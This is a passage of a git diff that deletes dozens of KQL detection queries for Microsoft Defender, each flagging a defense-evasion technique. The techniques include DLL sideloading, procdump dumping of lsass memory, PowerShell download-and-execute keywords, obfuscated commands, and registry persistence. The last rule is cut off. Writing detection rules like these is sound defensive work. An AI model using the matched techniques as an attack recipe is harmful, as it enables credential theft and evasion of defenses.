@@ -1,7 +0,0 @@ -// Author: Tim Rauch (rule), Elastic (idea) -// Date: 2022/10/21 -// Level: medium -// Description: Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking. -// Tags: attack.t1566, attack.t1566.001, attack.initial_access, attack.t1574, attack.t1574.001, attack.defense_evasion -DeviceFileEvents -| where ((InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\MSPUB.EXE" or InitiatingProcessFolderPath endswith "\\fltldr.exe" or InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\curl.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and (FolderPath contains "\\Microsoft\\OneDrive\\" or FolderPath contains "\\Microsoft OneDrive\\" or FolderPath contains "\\Microsoft\\Teams\\" or FolderPath contains "\\Local\\slack\\app-" or FolderPath contains "\\Local\\Programs\\Microsoft VS Code\\") and (FolderPath contains "\\Users\\" and FolderPath contains "\\AppData\\") and FolderPath endswith ".dll") and (not((InitiatingProcessFolderPath endswith "\\cmd.exe" and (FolderPath contains "\\Users\\" and FolderPath contains "\\AppData\\" and FolderPath contains "\\Microsoft\\OneDrive\\" and FolderPath contains "\\api-ms-win-core-")))) \ No newline at end of file 
diff --git a/Defense Evasion/Potential_Iviewers.DLL_Sideloading.kql b/Defense Evasion/Potential_Iviewers.DLL_Sideloading.kql deleted file mode 100644 index 3d46efa4..00000000 --- a/Defense Evasion/Potential_Iviewers.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/03/21 -// Level: high -// Description: Detects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer) -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\iviewers.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\Windows Kits\\" or FolderPath startswith "C:\\Program Files\\Windows Kits\\"))) \ No newline at end of file diff --git a/Defense Evasion/Potential_LSASS_Process_Dump_Via_Procdump.kql b/Defense Evasion/Potential_LSASS_Process_Dump_Via_Procdump.kql deleted file mode 100644 index 2d6086da..00000000 --- a/Defense Evasion/Potential_LSASS_Process_Dump_Via_Procdump.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2018/10/30 -// Level: high -// Description: Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. -This way we are also able to catch cases in which the attacker has renamed the procdump executable. - -// Tags: attack.defense_evasion, attack.t1036, attack.credential_access, attack.t1003.001, car.2013-05-009 -DeviceProcessEvents -| where (ProcessCommandLine contains " -ma " or ProcessCommandLine contains " /ma ") and ProcessCommandLine contains " ls" \ No newline at end of file diff --git a/Defense Evasion/Potential_LethalHTA_Technique_Execution.kql b/Defense Evasion/Potential_LethalHTA_Technique_Execution.kql deleted file mode 100644 index 9b4a423d..00000000 --- a/Defense Evasion/Potential_LethalHTA_Technique_Execution.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Markus Neis -// Date: 2018/06/07 -// Level: high -// Description: Detects potential LethalHTA technique where the "mshta.exe" is spawned by an "svchost.exe" process -// Tags: attack.defense_evasion, attack.t1218.005 -DeviceProcessEvents -| where FolderPath endswith "\\mshta.exe" and InitiatingProcessFolderPath endswith "\\svchost.exe" \ No newline at end of file diff --git a/Defense Evasion/Potential_Libvlc.DLL_Sideloading.kql b/Defense Evasion/Potential_Libvlc.DLL_Sideloading.kql deleted file mode 100644 index 3fce189b..00000000 --- a/Defense Evasion/Potential_Libvlc.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior -// Date: 2023/04/17 -// Level: medium -// Description: Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe" -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\libvlc.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\VideoLAN\\VLC\\" or FolderPath startswith "C:\\Program Files\\VideoLAN\\VLC\\"))) \ No newline at end of file diff --git a/Defense Evasion/Potential_Manage-bde.wsf_Abuse_To_Proxy_Execution.kql b/Defense Evasion/Potential_Manage-bde.wsf_Abuse_To_Proxy_Execution.kql deleted file mode 100644 index 4f76c2a3..00000000 --- a/Defense Evasion/Potential_Manage-bde.wsf_Abuse_To_Proxy_Execution.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems) -// Date: 2020/10/13 -// Level: high -// Description: Detects potential abuse of the "manage-bde.wsf" script as a LOLBIN to proxy execution -// Tags: attack.defense_evasion, attack.t1216 -DeviceProcessEvents -| where (ProcessCommandLine contains "manage-bde.wsf" and (FolderPath endswith "\\wscript.exe" or ProcessVersionInfoOriginalFileName =~ "wscript.exe")) or ((InitiatingProcessCommandLine contains "manage-bde.wsf" and (InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")) and (not(FolderPath endswith "\\cmd.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Potential_Memory_Dumping_Activity_Via_LiveKD.kql b/Defense Evasion/Potential_Memory_Dumping_Activity_Via_LiveKD.kql deleted file mode 100644 index 60343483..00000000 --- a/Defense Evasion/Potential_Memory_Dumping_Activity_Via_LiveKD.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/15 -// Level: medium -// Description: Detects execution of LiveKD based on PE metadata or image name -// Tags: attack.defense_evasion -DeviceProcessEvents -| where (FolderPath endswith "\\livekd.exe" or FolderPath endswith "\\livekd64.exe") or ProcessVersionInfoOriginalFileName =~ "livekd.exe" \ No newline at end of file diff --git a/Defense Evasion/Potential_Mfdetours.DLL_Sideloading.kql b/Defense Evasion/Potential_Mfdetours.DLL_Sideloading.kql deleted file mode 100644 index 163f4b42..00000000 --- a/Defense Evasion/Potential_Mfdetours.DLL_Sideloading.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/08/03 -// Level: medium -// Description: Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution. -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\mfdetours.dll" and (not(FolderPath contains ":\\Program Files (x86)\\Windows Kits\\10\\bin\\")) \ No newline at end of file diff --git a/Defense Evasion/Potential_Mftrace.EXE_Abuse.kql b/Defense Evasion/Potential_Mftrace.EXE_Abuse.kql deleted file mode 100644 index b0914264..00000000 --- a/Defense Evasion/Potential_Mftrace.EXE_Abuse.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/06/09 -// Level: medium -// Description: Detects child processes of the "Trace log generation tool for Media Foundation Tools" (Mftrace.exe) which can abused to execute arbitrary binaries. -// Tags: attack.defense_evasion, attack.t1127 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\mftrace.exe" \ No newline at end of file diff --git a/Defense Evasion/Potential_Mpclient.DLL_Sideloading.kql b/Defense Evasion/Potential_Mpclient.DLL_Sideloading.kql deleted file mode 100644 index 327de0bf..00000000 --- a/Defense Evasion/Potential_Mpclient.DLL_Sideloading.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Bhabesh Raj -// Date: 2022/08/02 -// Level: high -// Description: Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory. -// Tags: attack.defense_evasion, attack.t1574.002 -DeviceImageLoadEvents -| where (FolderPath endswith "\\mpclient.dll" and (InitiatingProcessFolderPath endswith "\\MpCmdRun.exe" or InitiatingProcessFolderPath endswith "\\NisSrv.exe")) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Windows Defender\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Security Client\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Windows Defender\\" or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/Defense Evasion/Potential_Mpclient.DLL_Sideloading_Via_Defender_Binaries.kql b/Defense Evasion/Potential_Mpclient.DLL_Sideloading_Via_Defender_Binaries.kql deleted file mode 100644 index 46d0f2c6..00000000 --- a/Defense Evasion/Potential_Mpclient.DLL_Sideloading_Via_Defender_Binaries.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Bhabesh Raj -// Date: 2022/08/01 -// Level: high -// Description: Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory. -// Tags: attack.defense_evasion, attack.t1574.002 -DeviceProcessEvents -| where (FolderPath endswith "\\MpCmdRun.exe" or FolderPath endswith "\\NisSrv.exe") and (not((FolderPath startswith "C:\\Program Files (x86)\\Windows Defender\\" or FolderPath startswith "C:\\Program Files\\Microsoft Security Client\\" or FolderPath startswith "C:\\Program Files\\Windows Defender\\" or FolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/Defense Evasion/Potential_MsiExec_Masquerading.kql b/Defense Evasion/Potential_MsiExec_Masquerading.kql deleted file mode 100644 index 7624082c..00000000 --- a/Defense Evasion/Potential_MsiExec_Masquerading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2019/11/14 -// Level: high -// Description: Detects the execution of msiexec.exe from an uncommon directory -// Tags: attack.defense_evasion, attack.t1036.005 -DeviceProcessEvents -| where (FolderPath endswith "\\msiexec.exe" or ProcessVersionInfoOriginalFileName =~ "\\msiexec.exe") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/Defense Evasion/Potential_NTLM_Coercion_Via_Certutil.EXE.kql b/Defense Evasion/Potential_NTLM_Coercion_Via_Certutil.EXE.kql deleted file mode 100644 index 5c519edc..00000000 --- a/Defense Evasion/Potential_NTLM_Coercion_Via_Certutil.EXE.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/09/01 -// Level: high -// Description: Detects possible NTLM coercion via certutil using the 'syncwithWU' flag -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where (ProcessCommandLine contains " -syncwithWU " and ProcessCommandLine contains " \\\\") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe") \ No newline at end of file diff --git a/Defense Evasion/Potential_NetWire_RAT_Activity_-_Registry.kql b/Defense Evasion/Potential_NetWire_RAT_Activity_-_Registry.kql deleted file mode 100644 index 39dcb31d..00000000 --- a/Defense Evasion/Potential_NetWire_RAT_Activity_-_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christopher Peacock -// Date: 2021/10/07 -// Level: high -// Description: Detects registry keys related to NetWire RAT -// Tags: attack.defense_evasion, attack.t1112 -DeviceRegistryEvents -| where ActionType =~ "RegistryKeyCreated" and RegistryKey contains "\\software\\NetWire" \ No newline at end of file diff --git a/Defense Evasion/Potential_Obfuscated_Ordinal_Call_Via_Rundll32.kql b/Defense Evasion/Potential_Obfuscated_Ordinal_Call_Via_Rundll32.kql deleted file mode 100644 index 1cd01f26..00000000 --- a/Defense Evasion/Potential_Obfuscated_Ordinal_Call_Via_Rundll32.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/17 -// Level: medium -// Description: Detects execution of "rundll32" with potential obfuscated ordinal calls -// Tags: attack.defense_evasion -DeviceProcessEvents -| where (ProcessCommandLine contains "#+" or ProcessCommandLine contains "#-") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32") \ No newline at end of file 
diff --git a/Defense Evasion/Potential_Password_Spraying_Attempt_Using_Dsacls.EXE.kql b/Defense Evasion/Potential_Password_Spraying_Attempt_Using_Dsacls.EXE.kql deleted file mode 100644 index de4b3519..00000000 --- a/Defense Evasion/Potential_Password_Spraying_Attempt_Using_Dsacls.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/06/20 -// Level: medium -// Description: Detects possible password spraying attempts using Dsacls -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where (ProcessCommandLine contains "/user:" and ProcessCommandLine contains "/passwd:") and (FolderPath endswith "\\dsacls.exe" or ProcessVersionInfoOriginalFileName =~ "DSACLS.EXE") \ No newline at end of file diff --git a/Defense Evasion/Potential_PendingFileRenameOperations_Tamper.kql b/Defense Evasion/Potential_PendingFileRenameOperations_Tamper.kql deleted file mode 100644 index 720a8993..00000000 --- a/Defense Evasion/Potential_PendingFileRenameOperations_Tamper.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2023/01/27 -// Level: medium -// Description: Detect changes to the "PendingFileRenameOperations" registry key from uncommon or suspicious images lcoations to stage currently used files for rename after reboot. -// Tags: attack.defense_evasion, attack.t1036.003 -DeviceRegistryEvents -| where (ActionType =~ "RegistryValueSet" and RegistryKey contains "\\CurrentControlSet\\Control\\Session Manager\\PendingFileRenameOperations") and ((InitiatingProcessFolderPath endswith "\\reg.exe" or InitiatingProcessFolderPath endswith "\\regedit.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" or InitiatingProcessFolderPath contains "\\Users\\Public\\")) \ No newline at end of file 
diff --git a/Defense Evasion/Potential_Persistence_Via_Custom_Protocol_Handler.kql b/Defense Evasion/Potential_Persistence_Via_Custom_Protocol_Handler.kql deleted file mode 100644 index 5e923f8b..00000000 --- a/Defense Evasion/Potential_Persistence_Via_Custom_Protocol_Handler.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/05/30 -// Level: medium -// Description: Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism. -// Tags: attack.defense_evasion, attack.t1112 -DeviceRegistryEvents -| where (RegistryValueData startswith "URL:" and RegistryKey startswith "HKEY_LOCAL_MACHINE\\CLASSES") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\") or RegistryValueData startswith "URL:ms-"))) \ No newline at end of file diff --git a/Defense Evasion/Potential_Persistence_Via_Event_Viewer_Events.asp.kql b/Defense Evasion/Potential_Persistence_Via_Event_Viewer_Events.asp.kql deleted file mode 100644 index 617d3ee9..00000000 --- a/Defense Evasion/Potential_Persistence_Via_Event_Viewer_Events.asp.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/02/17 -// Level: medium -// Description: Detects potential registry persistence technique using the Event Viewer "Events.asp" technique -// Tags: attack.persistence, attack.defense_evasion, attack.t1112 -DeviceRegistryEvents -| where (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgram" or RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionURL") and (not((RegistryValueData =~ "(Empty)" or (RegistryValueData =~ "%%SystemRoot%%\\PCHealth\\HelpCtr\\Binaries\\HelpCtr.exe" and InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\svchost.exe" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgram") or (RegistryValueData =~ "-url hcp://services/centers/support*topic=%%s" and InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\svchost.exe" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgramCommandLineParameters") or RegistryValueData =~ "http://go.microsoft.com/fwlink/events.asp"))) \ No newline at end of file diff --git a/Defense Evasion/Potential_Persistence_Via_GlobalFlags.kql b/Defense Evasion/Potential_Persistence_Via_GlobalFlags.kql deleted file mode 100644 index 0af11ee9..00000000 --- a/Defense Evasion/Potential_Persistence_Via_GlobalFlags.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Karneades, Jonhnathan Ribeiro, Florian Roth -// Date: 2018/04/11 -// Level: high -// Description: Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys -// Tags: attack.privilege_escalation, attack.persistence, attack.defense_evasion, attack.t1546.012, car.2013-01-002 -DeviceRegistryEvents -| where (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion" and RegistryKey contains "\\Image File Execution Options" and RegistryKey contains "\\GlobalFlag") or ((RegistryKey contains "\\ReportingMode" or RegistryKey contains "\\MonitorProcess") and (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion" and RegistryKey contains "\\SilentProcessExit")) \ No newline at end of file diff --git a/Defense Evasion/Potential_PowerShell_Command_Line_Obfuscation.kql b/Defense Evasion/Potential_PowerShell_Command_Line_Obfuscation.kql deleted file mode 100644 index 901cfc87..00000000 --- a/Defense Evasion/Potential_PowerShell_Command_Line_Obfuscation.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp) -// Date: 2020/10/15 -// Level: high -// Description: Detects the PowerShell command lines with special characters -// Tags: attack.execution, attack.defense_evasion, attack.t1027, attack.t1059.001 -DeviceProcessEvents -| where (((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine matches regex "\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+" or ProcessCommandLine matches regex "\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{" or ProcessCommandLine matches regex "\\^.*\\^.*\\^.*\\^.*\\^" or ProcessCommandLine matches regex "`.*`.*`.*`.*`")) and (not((InitiatingProcessFolderPath =~ "C:\\Program Files\\Amazon\\SSM\\ssm-document-worker.exe" or (ProcessCommandLine contains "new EventSource(\"Microsoft.Windows.Sense.Client.Management\"" or ProcessCommandLine contains "public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);")))) \ No newline at end of file diff --git a/Defense Evasion/Potential_PowerShell_Downgrade_Attack.kql b/Defense Evasion/Potential_PowerShell_Downgrade_Attack.kql deleted file mode 100644 index 1a70acae..00000000 --- a/Defense Evasion/Potential_PowerShell_Downgrade_Attack.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Harish Segar (rule) -// Date: 2020/03/20 -// Level: medium -// Description: Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0 -// Tags: attack.defense_evasion, attack.execution, attack.t1059.001 -DeviceProcessEvents -| where (ProcessCommandLine contains " -version 2 " or ProcessCommandLine contains " -versio 2 " or ProcessCommandLine contains " -versi 2 " or ProcessCommandLine contains " -vers 2 " or ProcessCommandLine contains " -ver 2 " or ProcessCommandLine contains " -ve 2 " or ProcessCommandLine contains " -v 2 ") and FolderPath endswith "\\powershell.exe" \ No newline at end of file diff --git a/Defense Evasion/Potential_PowerShell_Execution_Policy_Tampering.kql b/Defense Evasion/Potential_PowerShell_Execution_Policy_Tampering.kql deleted file mode 100644 index ef414d97..00000000 --- a/Defense Evasion/Potential_PowerShell_Execution_Policy_Tampering.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/11 -// Level: medium -// Description: Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution -// Tags: attack.defense_evasion -DeviceRegistryEvents -| where ((RegistryValueData contains "Bypass" or RegistryValueData contains "Unrestricted") and (RegistryKey endswith "\\ShellIds\\Microsoft.PowerShell\\ExecutionPolicy" or RegistryKey endswith "\\Policies\\Microsoft\\Windows\\PowerShell\\ExecutionPolicy")) and (not((InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\"))) \ No newline at end of file diff --git a/Defense Evasion/Potential_PowerShell_Execution_Policy_Tampering_-_ProcCreation.kql b/Defense Evasion/Potential_PowerShell_Execution_Policy_Tampering_-_ProcCreation.kql deleted file mode 100644 index 6c46475e..00000000 
--- a/Defense Evasion/Potential_PowerShell_Execution_Policy_Tampering_-_ProcCreation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/11 -// Level: high -// Description: Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine -// Tags: attack.defense_evasion -DeviceProcessEvents -| where (ProcessCommandLine contains "\\ShellIds\\Microsoft.PowerShell\\ExecutionPolicy" or ProcessCommandLine contains "\\Policies\\Microsoft\\Windows\\PowerShell\\ExecutionPolicy") and (ProcessCommandLine contains "Bypass" or ProcessCommandLine contains "RemoteSigned" or ProcessCommandLine contains "Unrestricted") \ No newline at end of file diff --git a/Defense Evasion/Potential_PowerShell_Execution_Via_DLL.kql b/Defense Evasion/Potential_PowerShell_Execution_Via_DLL.kql deleted file mode 100644 index 9ef6f39d..00000000 --- a/Defense Evasion/Potential_PowerShell_Execution_Via_DLL.kql +++ /dev/null 
@@ -1,9 +0,0 @@ -// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems) -// Date: 2018/08/25 -// Level: high -// Description: Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll. -This detection assumes that PowerShell commands are passed via the CommandLine. - -// Tags: attack.defense_evasion, attack.t1218.011 -DeviceProcessEvents -| where (ProcessCommandLine contains "Default.GetString" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "ICM " or ProcessCommandLine contains "IEX " or ProcessCommandLine contains "Invoke-Command" or ProcessCommandLine contains "Invoke-Expression") and ((FolderPath endswith "\\InstallUtil.exe" or FolderPath endswith "\\RegAsm.exe" or FolderPath endswith "\\RegSvcs.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe") or (ProcessVersionInfoOriginalFileName in~ ("InstallUtil.exe", "RegAsm.exe", "RegSvcs.exe", "REGSVR32.EXE", "RUNDLL32.EXE"))) \ No newline at end of file diff --git a/Defense Evasion/Potential_PowerShell_Obfuscation_Via_Reversed_Commands.kql b/Defense Evasion/Potential_PowerShell_Obfuscation_Via_Reversed_Commands.kql deleted file mode 100644 index b0d3f76d..00000000 --- a/Defense Evasion/Potential_PowerShell_Obfuscation_Via_Reversed_Commands.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton -// Date: 2020/10/11 -// Level: high -// Description: Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers -// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001 -DeviceProcessEvents -| where ((ProcessCommandLine contains "hctac" or ProcessCommandLine contains "kaerb" or ProcessCommandLine contains "dnammoc" or ProcessCommandLine contains "ekovn" or ProcessCommandLine contains "eliFd" or ProcessCommandLine contains "rahc" or ProcessCommandLine contains "etirw" or ProcessCommandLine contains "golon" or ProcessCommandLine contains "tninon" or ProcessCommandLine contains "eddih" or ProcessCommandLine contains "tpircS" or ProcessCommandLine contains "ssecorp" or ProcessCommandLine contains "llehsrewop" or ProcessCommandLine contains "esnopser" or ProcessCommandLine contains "daolnwod" or ProcessCommandLine contains "tneilCbeW" or ProcessCommandLine contains "tneilc" or ProcessCommandLine contains "ptth" or ProcessCommandLine contains "elifotevas" or ProcessCommandLine contains "46esab" or ProcessCommandLine contains "htaPpmeTteG" or ProcessCommandLine contains "tcejbO" or ProcessCommandLine contains "maerts" or ProcessCommandLine contains "hcaerof" or ProcessCommandLine contains "retupmoc") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))) and (not((ProcessCommandLine contains " -EncodedCommand " or ProcessCommandLine contains " -enc "))) \ No newline at end of file diff --git a/Defense Evasion/Potential_PowerShell_Obfuscation_Via_WCHAR.kql b/Defense Evasion/Potential_PowerShell_Obfuscation_Via_WCHAR.kql deleted file mode 100644 index 94151df4..00000000 --- a/Defense Evasion/Potential_PowerShell_Obfuscation_Via_WCHAR.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2020/07/09 -// Level: high -// Description: Detects suspicious encoded character syntax often used for defense evasion -// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027 -DeviceProcessEvents -| where ProcessCommandLine contains "(WCHAR)0x" \ No newline at end of file diff --git a/Defense Evasion/Potential_PrintNightmare_Exploitation_Attempt.kql b/Defense Evasion/Potential_PrintNightmare_Exploitation_Attempt.kql deleted file mode 100644 index 7040127d..00000000 --- a/Defense Evasion/Potential_PrintNightmare_Exploitation_Attempt.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Bhabesh Raj -// Date: 2021/07/01 -// Level: high -// Description: Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675 -// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574, cve.2021.1675 -DeviceFileEvents -| where InitiatingProcessFolderPath endswith "\\spoolsv.exe" and FolderPath contains "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\" \ No newline at end of file diff --git a/Defense Evasion/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql b/Defense Evasion/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql deleted file mode 100644 index 1a2be179..00000000 --- a/Defense Evasion/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash) -// Date: 2022/12/16 -// Level: high -// Description: Detects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll" -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation -DeviceFileEvents -| where FolderPath endswith "\\comctl32.dll" and (FolderPath startswith "C:\\Windows\\System32\\logonUI.exe.local" or FolderPath startswith "C:\\Windows\\System32\\werFault.exe.local" or FolderPath startswith "C:\\Windows\\System32\\consent.exe.local" or FolderPath startswith "C:\\Windows\\System32\\narrator.exe.local" or FolderPath startswith "C:\\Windows\\System32\\wermgr.exe.local") \ No newline at end of file diff --git a/Defense Evasion/Potential_Process_Execution_Proxy_Via_CL_Invocation.ps1.kql b/Defense Evasion/Potential_Process_Execution_Proxy_Via_CL_Invocation.ps1.kql deleted file mode 100644 index 0b840a5c..00000000 --- a/Defense Evasion/Potential_Process_Execution_Proxy_Via_CL_Invocation.ps1.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova -// Date: 2020/10/14 -// Level: medium -// Description: Detects calls to "SyncInvoke" that is part of the "CL_Invocation.ps1" script to proxy execution using "System.Diagnostics.Process" -// Tags: attack.defense_evasion, attack.t1216 -DeviceProcessEvents -| where ProcessCommandLine contains "SyncInvoke " \ No newline at end of file diff --git a/Defense Evasion/Potential_Process_Injection_Via_Msra.EXE.kql b/Defense Evasion/Potential_Process_Injection_Via_Msra.EXE.kql deleted file mode 100644 index cd1604d6..00000000 --- a/Defense Evasion/Potential_Process_Injection_Via_Msra.EXE.kql +++ /dev/null 
@@ -1,7 +0,0 @@
-// Author: Alexander McDonald
-// Date: 2022/06/24
-// Level: high
-// Description: Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics
-// Tags: attack.defense_evasion, attack.t1055
-DeviceProcessEvents
